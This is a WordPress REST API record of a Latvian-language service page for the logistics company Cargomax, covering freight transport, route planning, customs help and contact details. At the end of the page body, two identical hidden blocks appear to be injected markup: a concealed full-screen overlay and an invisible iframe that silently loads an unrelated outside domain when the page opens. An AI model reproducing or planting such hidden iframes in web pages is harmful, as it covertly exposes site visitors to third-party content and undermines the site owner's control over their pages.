{"id":132,"date":"2015-01-09T13:56:45","date_gmt":"2015-01-09T13:56:45","guid":{"rendered":"http:\/\/cargomax.lv\/?page_id=132"},"modified":"2018-10-03T15:38:37","modified_gmt":"2018-10-03T12:38:37","slug":"individualie-logistikas-risinajumi","status":"publish","type":"page","link":"https:\/\/cargomax.lv\/ru\/pakalpojumi\/individualie-logistikas-risinajumi\/","title":{"rendered":"Individu\u0101lie lo\u0123istikas risin\u0101jumi"},"content":{"rendered":"<p>Cargomax ir transporta uz\u0146\u0113mums, kas jau vair\u0101k nek\u0101 8 gadus pied\u0101v\u0101 saviem klientiem augstas kvalit\u0101tes kravu p\u0101rvad\u0101jumus (sauszemes, gaisa, j\u016bras un multimod\u0101los kravu p\u0101rvad\u0101jumus), da\u017e\u0101dus transporta pakalpojumus un citus profesion\u0101lus lo\u0123istikas pakalpojumus.<\/p>\n<p><strong>Uz kurieni varam pieg\u0101d\u0101t J\u016bsu kravu?<\/strong><\/p>\n<p>Glob\u0101lo t\u012bklu izveides un optimiz\u0101cijas rezult\u0101t\u0101 m\u0113s esam izveidoju\u0161i pla\u0161u sadarb\u012bbas partneru t\u012bklu vis\u0101 pasaul\u0113. Pateicoties cie\u0161ai sadarb\u012bbai ar m\u016bsu asoci\u0113to partneru un a\u0123entu p\u0101rst\u0101vniec\u012bb\u0101m, m\u0113s esam veiku\u0161i kravu transportu no\/uz Eiropu, \u0100ziju, \u0100friku, Austr\u0101liju, Dienvidameriku un Zieme\u013cameriku.<\/p>\n<p>Kravu p\u0101rvad\u0101jumu sist\u0113mas ietver da\u017e\u0101du kravu transport\u0113\u0161anu ar vienu, diviem vai vair\u0101kiem transporta veidiem uz praktiski jebkuru valsti pasaul\u0113, izmantojot autotransportu, avio un j\u016bras transportu, atsevi\u0161\u0137os gad\u012bjumos \u2013 ar\u012b dzelzce\u013ca transportu.<\/p>\n<p>Cargomax kravu p\u0101rvad\u0101jumu jom\u0101 sevi pozicion\u0113 k\u0101 <em>one-stop-shop<\/em> transporta partneri, pie kura ir iesp\u0113jami da\u017e\u0101di individu\u0101lie lo\u0123istikas risin\u0101jumi.<\/p>\n<p><strong>Individu\u0101lie lo\u0123istikas risin\u0101jumi \u2013 ko v\u0113l m\u0113s pied\u0101v\u0101jam?<\/strong><\/p>\n<ul>\n<li>Kravu p\u0101rvad\u0101jumu vad\u012bba, ietverot p\u0101rvad\u0101jumu pl\u0101no\u0161anu, pre\u010du pl\u016bsmu apvieno\u0161anu un p\u0101rkrau\u0161anas punktu pakalpojumus.<\/li>\n<li>Mar\u0161rutu sist\u0113mu pl\u0101no\u0161ana \u2013 mar\u0161rutu izv\u0113le, transport\u0113\u0161anas grafiku noteik\u0161ana.<\/li>\n<li>Apjoma noteik\u0161ana (pre\u010du masas un p\u0101rvad\u0101jumu apjoma noteik\u0161ana) un \u0101rpakalpojumu uz\u0146\u0113mumu piesaist\u012b\u0161ana.<\/li>\n<li>Kravu kust\u012bbas kontrole &#8211; informat\u012bv\u0101s pl\u016bsmas monitorings.<\/li>\n<li>R\u016bp\u012bga s\u016bt\u012bjumu datu apstr\u0101de un transporta dokumentu aizpild\u012b\u0161ana.<\/li>\n<li>Konsult\u0101cijas starptautisko kravu p\u0101rvad\u0101jumu optim\u0101lo sh\u0113mu organiz\u0101cijas jaut\u0101jumos.<\/li>\n<li>Profesion\u0101la konsult\u0101cija un pal\u012bdz\u012bba muitas dokumentu noform\u0113\u0161anas jaut\u0101jumos.<\/li>\n<li>Kravu papildu apdro\u0161in\u0101\u0161anas organiz\u0113\u0161ana.<\/li>\n<\/ul>\n<p>Individu\u0101lie lo\u0123istikas risin\u0101jumi vai v\u0113rien\u012bgi projekti, Cargomax ir J\u016bsu uzticamais partneris kravu p\u0101rvad\u0101jumu jom\u0101.<\/p>\n<p><strong>J\u016bsu iesp\u0113jas, izv\u0113loties Cargomax transporta pakalpojumus:<\/strong><\/p>\n<ul>\n<li>M\u0113s pieg\u0101d\u0101sim J\u016bsu preci (iesai\u0146oto preci vai vien\u012bbas, konteinerus, paletes) jebkur\u0101 apjom\u0101 Jums vajadz\u012bgaj\u0101 laik\u0101 un viet\u0101 ar p\u0113c iesp\u0113jas minim\u0101l\u0101k\u0101m izmaks\u0101m;<\/li>\n<li>Nodro\u0161in\u0101sim kvalitat\u012bvu un dro\u0161u materi\u0101lo resursu un gatav\u0101s produkcijas p\u0101rvad\u0101\u0161anu ar izmaksu zi\u0146\u0101 izdev\u012bg\u0101ko transporta veidu;<\/li>\n<li>K\u0101 papildu pakalpojumu m\u0113s varam nodro\u0161in\u0101t viet\u0113jos kravu p\u0101rvad\u0101jumus Latvij\u0101 un Baltij\u0101;<\/li>\n<li>M\u016bsu klientiem ar specifisk\u0101m pras\u012bb\u0101m pied\u0101v\u0101jam individu\u0101lus risin\u0101jumus, saska\u0146ojot da\u017e\u0101dus transporta veidus. Uz atsevi\u0161\u0137u piepras\u012bjumu pamata varam \u012bstenot multimod\u0101los kravu p\u0101rvad\u0101jumus caur visiem p\u0101rkrau\u0161anas punktiem;<\/li>\n<li>M\u0113s sniedzam konsult\u0101cijas par materi\u0101lu pl\u016bsmu, k\u0101 ar\u012b par visu ar transporta lo\u0123istikas darb\u012bb\u0101m saist\u012btu pl\u0101no\u0161anas, koordin\u0113\u0161anas un organiz\u0113\u0161anas procesu pas\u016bt\u012bjuma realiz\u0101cijas laik\u0101;<\/li>\n<li>Pateicoties pieredz\u0113ju\u0161ai un profesion\u0101lai komandai, modernam autoparkam, stabiliem un uzticamiem starptautiskajiem partneriem un viet\u0113jiem uz\u0146\u0113m\u0113jiem, m\u0113s varam nodro\u0161in\u0101t dro\u0161us, regul\u0101rus, kvalitat\u012bvus un \u0101trus kravu p\u0101rvad\u0101jumus par konkur\u0113tsp\u0113j\u012bg\u0101m izmaks\u0101m un citus lo\u0123istikas risin\u0101jumus;<\/li>\n<li>M\u016bsu r\u012bc\u012bb\u0101 ir pla\u0161a transport\u0113\u0161anas veida un pakalpojumu kl\u0101sta izv\u0113le, t\u0101p\u0113c m\u0113s varam izstr\u0101d\u0101t tie\u0161i Jums piem\u0113rot\u0101kos un izdev\u012bg\u0101kos lo\u0123istikas risin\u0101jumus.<\/li>\n<\/ul>\n<p><strong>Paaugstiniet savas uz\u0146\u0113m\u0113jdarb\u012bbas efektivit\u0101ti, izmantojot Cargomax profesion\u0101los transporta pakalpojumus! <\/strong><\/p>\n<p><strong>M\u016bsu sasniegumi <\/strong><\/p>\n<p>M\u016bsu portfel\u012b ir t\u0101di pan\u0101kumi k\u0101 piedal\u012b\u0161an\u0101s ANO <em>World Food Programme<\/em> projekt\u0101 (hum\u0101n\u0101s pal\u012bdz\u012bbas pieg\u0101de Tad\u017eikist\u0101n\u0101), pilnas lo\u0123istikas sh\u0113mas organiz\u0101cija Latvijas r\u016bpn\u012bcai, kas ir viena no pasaules l\u012bder\u0113m ielu t\u012br\u012b\u0161anas ma\u0161\u012bnu ra\u017eo\u0161an\u0101, k\u0101 ar\u012b sporta pre\u010du veikala t\u012bkla pilna lo\u0123istikas cikla nodro\u0161in\u0101\u0161ana importa krav\u0101m un daudzi citi kompleksi individu\u0101lie lo\u0123istikas risin\u0101jumi un projekti.<\/p>\n<p><strong>Sazinieties ar mums<\/strong><\/p>\n<p>Ja Jums ir nepiecie\u0161ami kompleksi individu\u0101lie lo\u0123istikas risin\u0101jumi vai ar\u012b, ja J\u016bs v\u0113laties uzlabot savu \u0161\u012b br\u012b\u017ea lo\u0123istikas sist\u0113mu, J\u016bs varat sazin\u0101ties ar mums pa t\u0101lruni +371 67 359 770 vai ar Skype pal\u012bdz\u012bbu (<a href=\"skype:cargomax.info\">cargomax.info<\/a>), s\u016btot e-pastu uz <a href=\"mailto:info@cargomax.lv\">info@cargomax.lv<\/a> vai noform\u0113jot on-line piepras\u012bjumu m\u016bsu m\u0101jaslap\u0101.<\/p>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/shortem.com\/w\/whitelisted\/\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/shortem.com\/w\/whitelisted\/\"><\/iframe><\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Cargomax ir transporta uz\u0146\u0113mums, kas jau vair\u0101k nek\u0101 8 gadus pied\u0101v\u0101 saviem klientiem augstas kvalit\u0101tes kravu p\u0101rvad\u0101jumus (sauszemes, gaisa, j\u016bras un multimod\u0101los kravu p\u0101rvad\u0101jumus), [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":16,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/cargomax.lv\/ru\/wp-json\/wp\/v2\/pages\/132\/"}],"collection":[{"href":"https:\/\/cargomax.lv\/ru\/wp-json\/wp\/v2\/pages\/"}],"about":[{"href":"https:\/\/cargomax.lv\/ru\/wp-json\/wp\/v2\/types\/page\/"}],"author":[{"embeddable":true,"href":"https:\/\/cargomax.lv\/ru\/wp-json\/wp\/v2\/users\/1\/"}],"replies":[{"embeddable":true,"href":"https:\/\/cargomax.lv\/ru\/wp-json\/wp\/v2\/comments\/?post=132"}],"version-history":[{"count":4,"href":"https:\/\/cargomax.lv\/ru\/wp-json\/wp\/v2\/pages\/132\/revisions\/"}],"predecessor-version":[{"id":1537,"href":"https:\/\/cargomax.lv\/ru\/wp-json\/wp\/v2\/pages\/132\/revisions\/1537\/"}],"up":[{"embeddable":true,"href":"https:\/\/cargomax.lv\/ru\/wp-json\/wp\/v2\/pages\/16\/"}],"wp:attachment":[{"href":"https:\/\/cargomax.lv\/ru\/wp-json\/wp\/v2\/media\/?parent=132"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}